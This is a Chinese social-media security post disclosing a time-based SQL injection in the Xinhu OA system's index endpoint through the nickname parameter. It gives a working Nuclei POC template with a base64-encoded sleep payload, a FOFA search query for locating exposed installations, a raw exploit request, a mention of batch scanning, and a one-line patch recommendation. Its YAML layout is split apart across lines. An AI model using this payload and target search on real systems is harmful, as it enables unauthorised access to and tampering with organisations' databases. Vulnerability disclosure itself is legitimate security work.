信呼OA系统index接口处nickname参数存在SQL注入漏洞。这可能导致泄露敏感数据、破坏数据库完整性,甚至获取对数据库的完全控制。
01
—
Nuclei POC
id
: xinhu-index-nickname-SQL
info
:
name
:
信呼OA系统index接口处nickname参数存在SQL注入漏洞
author
:
kingkong
severity
:
high
metadata
:
:
icon_hash="1652488516"
http
:
raw:
|
GET
/index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
Host
:
{{Hostname}}
:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
:
and
matchers
:
type: dsl
dsl
:
"duration>=5 && duration<=8 && status_code==200"
02 —
搜索语法
FOFA:icon_hash=
"1652488516"
界面如下
03
—
漏洞复现
漏洞检测POC
GET
/index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw==
HTTP/1.1
Host
:
User-Agent
: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language
: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding
: gzip, deflate
DNT
: 1
Connection
: close
Upgrade-Insecure-Requests
: 1
neclei批量检测截图
04
—
修复建议
更新当前系统或软件至最新版
原文始发于微信公众号(脚本小子):信呼OA系统index接口处nickname参数存在SQL注入漏洞【漏洞复现|附nuclei-POC】
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论